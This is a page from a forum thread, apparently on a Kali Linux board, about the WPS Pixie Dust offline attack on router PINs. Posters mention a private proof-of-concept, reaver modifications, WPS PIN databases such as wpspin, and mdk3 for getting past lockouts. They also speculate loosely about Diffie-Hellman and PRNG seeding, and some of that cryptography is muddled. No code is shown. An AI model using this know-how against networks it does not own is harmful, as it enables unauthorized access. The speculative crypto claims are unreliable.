Page 2 of 58 FirstFirst 12341252 ... LastLast
Results 11 to 20 of 580

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #11
    Junior Member
    Join Date
    Oct 2014
    Posts
    28
    Yea share the knowledge if you know something we do not. Thanks

  2. #12
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    I have emailed Bongard I don't think that he's gunna release any tool... Sti waiting for a response from you datahead

  3. #13
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    Quote Originally Posted by datahead View Post
    You are on the right track
    I do have a complete and working PoC program that I use. while it says few routers, I've found a lot more are vulnerable than one would think. All through trial and error of testing which router has which chipset, broadcom, ralink, atheros etc. around 12 of the 20 I've tested on, have been vulnerable.
    OR could you explain how one can go about making their own tool? Such as what modifications we have to make to reaver?

  4. #14
    Member
    Join Date
    Jun 2014
    Posts
    71
    Hello guys I am new to Kali Linux, reaver , aircrack and such. I was able to audit my Linksys E1000 with Reaver.

    But I wanted to know if you guys knew about wpispin . Its a software for windows but it contains a database with WPS pin. I am going to attach some screenshoots
    http://postimg.org/image/l7af4yy15/ , http://postimg.org/image/o0se9ux99/

    The name of it its WPS-PIN I think the source is www.inforprograma.net , the software is in spanish. It is very interesting

  5. #15
    Junior Member
    Join Date
    Jan 2014
    Posts
    12
    wpspin, yes it help me found some key in a 3 second
    the window version is WPSPIN Betis-Jesus
    the other one works on Kali
    wpspin v1.5

  6. #16
    Member
    Join Date
    Jun 2014
    Posts
    71
    What do you usually do when the AP limiting error comes.

  7. #17
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    Quote Originally Posted by frafri View Post
    What do you usually do when the AP limiting error comes.
    Check this out
    https://forums.kali.org/showthread.p...highlight=mdk3

  8. #18
    Senior Member
    Join Date
    Jun 2013
    Posts
    125
    Quote Originally Posted by soxrok2212 View Post
    Ahh soxrok2212..this thread brings back memories ....when I struggled with bash..my first script....I am still making lengthy roadways in bash and python .thanks to this site====>stackoverflow.com

  9. #19
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    New piece of information I am trying to understand. So in the M1 message, we receive a nonce, aka the PKE (DH Key from the enrollee). According to this document, the formula for generating these DH Keys is g^AB mod p, aka PKR result^PKE private number mod p. (G is the public number from the registrar, AB is the enrollee's private number used to generate its own public number, and p is the prime modulus. Now, both the enrollee and the registrar each know the shared secret, which I am led to believe is the seed of the PRNG, (I may be wrong here but it all make sense... for now.)

    For more information about Diffle-Hellman Keys, (DH Keys), do a quick youtube search for dh key exchange (can't post youtube links).
    You can read more about modular arithmetic here.

    I'll be looking more into DH Keys and their integration with PRNGs over the next few days/weeks. If you find anything, leave a comment.

  10. #20
    Senior Member
    Join Date
    Jun 2013
    Posts
    125
    Quote Originally Posted by soxrok2212 View Post
    New piece of information I am trying to understand. So in the M1 message, we receive a nonce, aka the PKE (DH Key from the enrollee). According to this document, the formula for generating these DH Keys is g^AB mod p, aka PKR result^PKE private number mod p. (G is the public number from the registrar, AB is the enrollee's private number used to generate its own public number, and p is the prime modulus. Now, both the enrollee and the registrar each know the shared secret, which I am led to believe is the seed of the PRNG, (I may be wrong here but it all make sense... for now.)

    For more information about Diffle-Hellman Keys, (DH Keys), do a quick youtube search for dh key exchange (can't post youtube links).
    You can read more about modular arithmetic here.

    I'll be looking more into DH Keys and their integration with PRNGs over the next few days/weeks. If you find anything, leave a comment.
    the time taken decrypt the private keys (Private Random number) sent during the Diffie-Helman process depends on the prime modulus used (mod p in our case)...the biggger the prime modulus..the longer it will take, also take into consideration the magntitude of the generator in this case "g"....here is another good link which explains the "Alice and Bob" theory..the mathematics might be a little messed up for some...

    http://www.academia.edu/1958665/Eucl...urity_Protocol

    GRAPHICAL PATTERNS in Exponential functions that inlcude the modulus of private random prime numbers might be a breakthorugh in the future...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •